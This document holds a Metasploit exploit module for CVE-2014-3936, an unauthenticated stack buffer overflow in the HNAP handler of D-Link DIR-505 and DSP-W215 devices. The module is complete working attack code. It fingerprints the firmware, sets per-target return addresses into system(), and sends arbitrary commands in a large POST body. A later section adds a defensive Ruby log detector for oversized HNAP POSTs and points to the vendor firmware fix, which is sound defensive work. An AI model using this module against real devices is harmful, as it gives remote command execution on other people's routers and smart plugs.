D-Link HNAP Request Remote Buffer Overflow
Source: metasploit.com  Author: Heffner  Published: 2014-07-14
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'D-Link HNAP Request Remote Buffer Overflow',
      'Description'    => %q{
        This module exploits an unauthenticated remote code execution vulnerability on several
        D-Link devices. The vulnerability is due to a stack-based buffer overflow while
        handling malicious HTTP POST requests addressed to the HNAP handler. This module
        has been successfully tested on a D-Link DIR-505 in an emulated environment.
      },
      'Author'         =>
        [
          'Craig Heffner', # vulnerability discovery and initial exploit
          'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => 'linux',
      'Arch'           => ARCH_MIPSBE,
      'References'     =>
        [
          ['CVE', '2014-3936'],
          ['BID', '67651'],
          ['URL', 'http://www.devttys0.com/2014/05/hacking-the-d-link-dsp-w215-smart-plug/'], # blog post from Craig including PoC
          ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10029']
        ],
      'Targets'        =>
        [
          #
          # Automatic targeting via fingerprinting
          #
          [ 'Automatic Targeting', { 'auto' => true }  ],
          [ 'D-Link DSP-W215 - v1.0',
            {
              'Offset'  => 1000000,
              'Ret'     => 0x405cac, # jump to system - my_cgi.cgi
            }
          ],
          [ 'D-Link DIR-505 - v1.06',
            {
              'Offset'  => 30000,
              'Ret'     => 0x405234, # jump to system - my_cgi.cgi
            }
          ],
          [ 'D-Link DIR-505 - v1.07',
            {
              'Offset'  => 30000,
              'Ret'     => 0x405c5c, # jump to system - my_cgi.cgi
            }
          ]
        ],
      'DisclosureDate' => 'May 15 2014',
      'DefaultTarget'  => 0))

    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
  end

  def check
    begin
      res = send_request_cgi({
        'uri' => "/HNAP1/",
        'method'  => 'GET'
      })

      if res && [200, 301, 302].include?(res.code)
        if res.body =~ /DIR-505/ && res.body =~ /1.07/
          @my_target = targets[3] if target['auto']
          return Exploit::CheckCode::Appears
        elsif res.body =~ /DIR-505/ && res.body =~ /1.06/
          @my_target = targets[2] if target['auto']
          return Exploit::CheckCode::Appears
        elsif res.body =~ /DSP-W215/ && res.body =~ /1.00/
          @my_target = targets[1] if target['auto']
          return Exploit::CheckCode::Appears
        else
          return Exploit::CheckCode::Detected
        end
      end
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Safe
    end

    Exploit::CheckCode::Unknown
  end

  def exploit
    print_status("#{peer} - Trying to access the vulnerable URL...")

    @my_target = target
    check_code = check

    unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears
      fail_with(Failure::NoTarget, "#{peer} - Failed to detect a vulnerable device")
    end

    if @my_target.nil? || @my_target['auto']
      fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...")
    end

    print_status("#{peer} - Exploiting #{@my_target.name}...")
    execute_cmdstager(
      :flavor  => :echo,
      :linemax => 185
    )
  end

  def prepare_shellcode(cmd)
    buf = rand_text_alpha_upper(@my_target['Offset'])  # Stack filler
    buf << rand_text_alpha_upper(4)                    # $s0, don't care
    buf << rand_text_alpha_upper(4)                    # $s1, don't care
    buf << rand_text_alpha_upper(4)                    # $s2, don't care
    buf << rand_text_alpha_upper(4)                    # $s3, don't care
    buf << rand_text_alpha_upper(4)                    # $s4, don't care
    buf << [@my_target.ret].pack("N")                  # $ra

    # Gadget at 'Ret' (my_cgi.cgi):
    #   la $t9, system
    #   la $s1, 0x440000
    #   jalr $t9 ; system
    #   addiu $a0, $sp, 0x28 # our command

    buf << rand_text_alpha_upper(40)                # Stack filler
    buf << cmd                                      # Command to execute
    buf << "\x00"                                   # NULL-terminate the command
  end

  def execute_command(cmd, opts)
    shellcode = prepare_shellcode(cmd)

    begin
      res = send_request_cgi({
        'method' => 'POST',
        'uri' => "/HNAP1/",
        'encode_params' => false,
        'data' => shellcode
      }, 5)
      return res
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end
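The module above sends its payload as a raw POST body to /HNAP1/ whose length is the target's 'Offset' (30,000 or 1,000,000 bytes) plus a few dozen bytes of register filler and the command. Legitimate HNAP traffic consists of small SOAP envelopes, so from a defender's side the simplest signal is a POST to the HNAP handler with an abnormally large request body. The following Ruby script is an added example, not part of the Metasploit module or of any D-Link software: it parses a constructed access-log sample (combined-log style with the request body size appended as the last field, an assumed format) and flags HNAP POSTs above a size threshold. The threshold value and the log lines are assumptions chosen for illustration.

```ruby
# Added example: log-based detector for oversized HNAP POST requests.
# Assumed log format (constructed for this example), one request per line:
#   client - - [timestamp] "METHOD URI HTTP/1.x" status resp_bytes req_body_bytes
HNAP_LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<uri>\S+) [^"]*" (?<status>\d{3}) (?<resp>\d+|-) (?<body>\d+)\z/

# Real HNAP SOAP requests are a few hundred bytes to a few KB; the smallest
# target offset in the module above is 30,000 bytes, so 8 KB (an assumed
# value) leaves ample headroom without missing the exploit traffic.
MAX_SANE_HNAP_BODY = 8_192

# Parse one log line into a Hash, or return nil if it does not match the format.
def parse_log_line(line)
  m = HNAP_LOG_RE.match(line.strip)
  return nil unless m
  {
    ip: m[:ip], ts: m[:ts], method: m[:method], uri: m[:uri],
    status: m[:status].to_i, body: m[:body].to_i
  }
end

# True when the entry is a POST to the HNAP handler with a body larger than
# any plausible SOAP request.
def suspicious_hnap_request?(entry, threshold = MAX_SANE_HNAP_BODY)
  return false unless entry
  entry[:method] == 'POST' &&
    entry[:uri].start_with?('/HNAP1') &&
    entry[:body] > threshold
end

# Return the entries that should raise an alert.
def scan_hnap_log(lines, threshold = MAX_SANE_HNAP_BODY)
  lines.map { |l| parse_log_line(l) }
       .select { |e| suspicious_hnap_request?(e, threshold) }
end

# Constructed sample: a normal GET/POST to HNAP, two oversized POSTs of roughly
# Offset + 60 bytes (the module's DIR-505 payload size), and an unrelated POST.
SAMPLE_LOG = <<~LOG
  192.0.2.10 - - [14/Jul/2014:10:01:02 +0000] "GET /HNAP1/ HTTP/1.1" 200 1532 0
  192.0.2.10 - - [14/Jul/2014:10:01:05 +0000] "POST /HNAP1/ HTTP/1.1" 200 412 637
  198.51.100.7 - - [14/Jul/2014:10:02:11 +0000] "POST /HNAP1/ HTTP/1.1" 500 0 30061
  198.51.100.7 - - [14/Jul/2014:10:02:12 +0000] "POST /HNAP1/ HTTP/1.1" 500 0 30059
  192.0.2.10 - - [14/Jul/2014:10:03:00 +0000] "POST /cgi-bin/login HTTP/1.1" 200 88 40
LOG

if __FILE__ == $0
  scan_hnap_log(SAMPLE_LOG.lines).each do |h|
    puts "ALERT #{h[:ts]} #{h[:ip]} POST #{h[:uri]} body=#{h[:body]} bytes"
  end
end
```

Run against the sample, the two 30 KB POSTs from 198.51.100.7 are reported and the normal HNAP exchange is not. A size-only rule is deliberately coarse: the module's 'Ret' values differ per firmware, but every target still needs a body far beyond SOAP size, so the check is independent of the specific device. The fix for affected devices is the firmware update in the D-Link advisory (SAP10029) listed in the module's References.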
